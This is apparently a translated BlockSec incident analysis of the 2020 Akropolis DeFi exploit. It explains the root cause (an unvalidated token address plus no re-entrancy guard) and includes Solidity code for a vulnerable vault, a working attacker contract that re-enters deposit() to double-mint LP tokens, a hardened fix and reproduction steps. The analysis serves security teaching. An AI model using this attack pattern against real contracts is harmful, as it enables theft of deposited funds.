
Decentralized finance (DeFi) is one of the most popular forms of project in the blockchain ecosystem, which makes its security particularly important: since last year, dozens of security incidents have occurred.
0xffffffff. Preface
As a research team that has long focused on DeFi security (https://blocksecteam.com), BlockSec has independently discovered a number of DeFi security incidents, and its research results have been published at top security conferences (including USENIX Security, CCS and Black Hat). Over the coming period we will systematically analyze DeFi security incidents and the root causes behind them.
Past review:
(1) [BlockSec DeFi Attack Analysis Series 1] I speak for myself: ChainSwap attack event analysis
(2) [BlockSec DeFi Attack Analysis Series 2] Give away everything: Sushiswap fees stolen
Reading suggestions:
If you are new to DeFi (Ethereum), you can read from the beginning. The article is fairly long, so if you cannot finish it, remember to follow us before leaving.
If you already understand DeFi aggregator projects such as Akropolis, you can skip directly to "0x2. Attack principle".
0x0. Background introduction
We take the following attack transaction as the example for an in-depth interpretation of the principle of this attack.
Time: Nov-12-2020 12:04:02 PM +UTC, block #11242695
2020 can be described as the first year of decentralized finance (hereinafter DeFi). As the DeFi ecosystem keeps developing, more and more DeFi projects are deployed on Ethereum, and ordinary users can pick the projects they like and invest in them to earn a return. With the rapid expansion of the DeFi market, however, ordinary users face the problem of choosing an investment target among the many projects; they need someone to invest on their behalf. A series of asset custody and portfolio platforms have emerged to meet this need, and Akropolis is one of them:
Ordinary users deposit their digital assets into Akropolis; Akropolis decides where to invest them and optimizes the investment strategy, and once it earns a return it distributes that income pro rata to the users who invested. In real-world financial terms, Akropolis is like a fund and the DeFi projects it invests in are like stocks: retail investors buy the fund, the fund holds the stocks, and the fund distributes the proceeds to the investors after earning income.
0x1. Akropolis mechanism
For ease of understanding, we first briefly introduce the two contracts involved in this attack: the Protocol contract and the Akropolis contract.
Protocol can be understood simply as follows: users deposit their tokens into the Protocol and receive a share of the Protocol in return; when the assets held by the Protocol appreciate later, the user can claim a corresponding amount of income from the Protocol.
As noted above, because there are so many DeFi projects on Ethereum, a user who wants to invest in several of them either does not know how to choose or finds the operations cumbersome. Akropolis therefore plays the role of an investment aggregator: it is bound to multiple DeFi investment projects (Protocols), and users can invest the tokens they hold through Akropolis with little effort. The user only needs to call an Akropolis function and specify the Protocol to invest in, and Akropolis completes the investment in that Protocol on the user's behalf.
The overall interaction logic is shown in the figure:
Akropolis exposes two external interfaces: function deposit(address _protocol, address[] memory _tokens, uint256[] memory _dnAmounts) and function withdraw(address _protocol, address token, uint256 dnAmount, uint256 maxNAmount).
Akropolis.deposit function:
The deposit function works as follows:
1. The user calls deposit.
2. Akropolis first queries how many tokens the Protocol currently holds: nBalanceBefore.
3. Akropolis transfers the user's tokens into the Protocol.
4. Akropolis queries the Protocol's token balance again: nBalanceAfter.
5. The user's deposit amount is derived as nDeposit = nBalanceAfter - nBalanceBefore.
6. The user's investment share (LP tokens) is calculated from this deposit amount.
Akropolis.withdraw function:
Code of Akropolis.depositToProtocol, Akropolis.distributeYieldInternal, Akropolis.updateProtocolBalance and Protocol.normalizedBalance (shown as images in the original):
Note that _registeredTokens = [DAI, USDC, USDT, TUSD] in Protocol.normalizedBalance. The distributeYieldInternal and updateProtocolBalance functions used by deposit query the balance of all registered tokens (that is, DAI, USDC, USDT and TUSD) currently held by the Protocol contract. "normalizedBalance" here means that the balances are normalized before being summed, because the different tokens have different decimals.
To summarize: users call the deposit function, specifying a Protocol, a token and a token amount, to deposit tokens into Akropolis; Akropolis mints Akropolis LP tokens for the user according to the amount deposited, and then invests the user's tokens into the Protocol. By calling the withdraw function, the user redeems the tokens deposited through deposit together with the interest earned.
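As an added illustration (not the Akropolis Protocol code; contract and function names are hypothetical), the following contract shows how a normalizedBalance of the kind described above can be computed over a fixed list of registered tokens with differing decimals, and why a token outside that list cannot move the figure:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not the Akropolis Protocol contract. Names are hypothetical.
interface IERC20Metadata {
    function balanceOf(address account) external view returns (uint256);
    function decimals() external view returns (uint8);
}

contract NormalizedBalanceExample {
    // Fixed at deployment, e.g. [DAI, USDC, USDT, TUSD] on mainnet.
    address[] private _registeredTokens;

    constructor(address[] memory registeredTokens) {
        _registeredTokens = registeredTokens;
    }

    // Scale a token amount to 18 decimals so balances of different tokens
    // can be summed. USDC/USDT use 6 decimals, DAI/TUSD use 18; a token with
    // more than 18 decimals is scaled down (precision below 1e-18 is lost).
    function normalize(uint256 amount, uint8 decimals) public pure returns (uint256) {
        if (decimals == 18) return amount;
        if (decimals < 18) return amount * 10 ** uint256(18 - decimals);
        return amount / 10 ** uint256(decimals - 18);
    }

    // Sum of this contract's balances of the registered tokens, 18-decimal scaled.
    // Only registered tokens are read: a transfer of any other token, real or
    // fake, leaves this value unchanged. A deposit() that diffs this figure
    // before and after an untrusted transferFrom() therefore measures only the
    // real tokens moved during that call, not whether the token it was asked
    // to pull is genuine.
    function normalizedBalance() public view returns (uint256 total) {
        for (uint256 i = 0; i < _registeredTokens.length; i++) {
            IERC20Metadata token = IERC20Metadata(_registeredTokens[i]);
            total += normalize(token.balanceOf(address(this)), token.decimals());
        }
    }
}
```

The point to keep in mind for the next section: because the before/after diff only ever sees the registered tokens, passing an unregistered address as the token does not produce a zero or an error; it produces whatever delta the untrusted transferFrom call happens to cause by other means.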
0x2. Attack principle
We noticed that Akropolis.deposit first computes the balance before, then calls the token's transferFrom to move the tokens into the Protocol, and finally computes the balance after. This calculation is correct under normal logic. But if the token address supplied by the attacker is a malicious address (that is, a fake token contract; Akropolis does not verify the token address), then no real tokens are transferred to the Protocol account at all, and Akropolis.deposit has no re-entrancy protection. The attacker can therefore attack Akropolis by combining two weaknesses: 1. the token address is not verified, and 2. the deposit function has no re-entrancy guard. The attack flow is as follows:
STEP 1: The attacker calls Akropolis.deposit, passing a malicious contract address as the token parameter. Inside the function, balanceBefore1 is computed first, and then, because the token address is a fake token forged by the attacker, Akropolis calls fakeToken.transferFrom.
STEP 2: In fakeToken.transferFrom, the fake token calls Akropolis.deposit again, this time with the real DAI address, so the second deposit follows the normal logic: the attacker deposits a sum of DAI, and Akropolis mints the corresponding LP tokens for the attacker according to balanceAfter2 - balanceBefore2. Note that balanceBefore2 = balanceBefore1, because no real token has moved between the two reads.
STEP 3: Although the attacker sent only about $25k of DAI to the Protocol in the whole transaction, balanceBefore1 was read before the inner deposit and is never refreshed. When control returns to the outer deposit, it computes balanceAfter1 - balanceBefore1, which again equals the $25k of DAI, so it believes the attacker has deposited another $25k and mints the corresponding LP tokens to the attacker a second time.
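The three steps above, modelled as an added example that is not the Akropolis code: a simplified vault with the same before/transfer/after accounting, an attacker contract that doubles as the fake token, and a hardened deposit. All contract, variable and function names are hypothetical, and the vault tracks a single registered token (DAI) instead of the four summed by Protocol.normalizedBalance so that the accounting stays visible.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example modelling the attack described above. It is NOT the
// Akropolis code: names are hypothetical and only DAI is tracked.
interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

contract VulnerableVault {
    IERC20 public immutable dai;                  // the only registered token
    address public immutable protocol;            // where deposits are parked
    mapping(address => uint256) public lpBalance; // LP tokens per depositor

    constructor(IERC20 _dai, address _protocol) {
        dai = _dai;
        protocol = _protocol;
    }

    // Same before/transfer/after accounting as the article's deposit().
    // Weakness 1: `token` is never checked against the registered list.
    // Weakness 2: no re-entrancy guard around the external call.
    function deposit(address token, uint256 amount) external {
        uint256 nBalanceBefore = dai.balanceOf(protocol);
        IERC20(token).transferFrom(msg.sender, protocol, amount); // attacker-controlled
        uint256 nBalanceAfter = dai.balanceOf(protocol);
        uint256 nDeposit = nBalanceAfter - nBalanceBefore;
        lpBalance[msg.sender] += nDeposit;        // 1 LP token per unit deposited
    }
}

// The attacker contract doubles as the fake token: its transferFrom()
// re-enters deposit() with real DAI, so the inner and the outer call
// observe the same balance delta and both mint LP tokens.
contract Attacker {
    VulnerableVault private immutable vault;
    IERC20 private immutable dai;

    constructor(VulnerableVault _vault, IERC20 _dai) {
        vault = _vault;
        dai = _dai;
    }

    // STEP 1: fund this contract with `amount` DAI first, then call attack().
    function attack(uint256 amount) external {
        dai.approve(address(vault), amount);
        vault.deposit(address(this), amount);     // token = this fake contract
    }

    // STEP 2: the vault calls the "token"; re-enter with the real DAI address.
    // balanceBefore2 == balanceBefore1 because nothing has moved yet.
    function transferFrom(address, address, uint256 amount) external returns (bool) {
        require(msg.sender == address(vault), "only vault");
        vault.deposit(address(dai), amount);      // inner call mints `amount` LP
        return true;
    }
    // STEP 3: the outer deposit() resumes, reads balanceAfter1 == balanceBefore1 + amount
    // and mints `amount` LP again: 2 * amount LP tokens for `amount` DAI.
}

// Hardened variant: register tokens explicitly and block re-entry.
contract HardenedVault {
    IERC20 public immutable dai;
    address public immutable protocol;
    mapping(address => bool) public registeredToken;
    mapping(address => uint256) public lpBalance;
    uint256 private _lock = 1;

    modifier nonReentrant() {
        require(_lock == 1, "reentrant call");
        _lock = 2;
        _;
        _lock = 1;
    }

    constructor(IERC20 _dai, address _protocol) {
        dai = _dai;
        protocol = _protocol;
        registeredToken[address(_dai)] = true;
    }

    function deposit(address token, uint256 amount) external nonReentrant {
        require(registeredToken[token], "token not registered"); // fix 1: whitelist
        uint256 nBalanceBefore = dai.balanceOf(protocol);
        IERC20(token).transferFrom(msg.sender, protocol, amount);
        uint256 nBalanceAfter = dai.balanceOf(protocol);
        lpBalance[msg.sender] += nBalanceAfter - nBalanceBefore;
    }
}
```

To reproduce the accounting locally, deploy any mock ERC-20 as `dai`, fund `Attacker` with `amount`, and call `attack(amount)`: afterwards `lpBalance(attacker)` on VulnerableVault is `2 * amount` although `protocol` received only `amount` DAI. Against HardenedVault the same call reverts with "token not registered"; the `nonReentrant` modifier is kept as well because a registered token with transfer hooks (an ERC-777, for instance) could still call back into the vault during transferFrom, and the whitelist alone would not stop that.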
Driven by core security technology, the BlockSec team has long focused on DeFi security, digital currency anti-money laundering, and digital asset custody based on privacy-preserving computation, providing contract security and digital asset security services to DApp project teams. The team has published more than 20 papers at top security venues (CCS, USENIX Security, S&P), and its partners have been ranked by AMiner among the world's most influential security and privacy scholars (sixth in the world for 2011-2020). Its research results have been reported by CCTV, Xinhua News Agency and overseas media. The team has independently discovered dozens of DeFi security vulnerabilities and threats, and won first place worldwide in the 2019 National Institutes of Health privacy computing competition (SGX track). Driven by technology, the team adheres to the concept of openness and win-win cooperation, and works with community partners to build a secure DeFi ecosystem.
https://www.blocksecteam.com/
contact@blocksecteam.com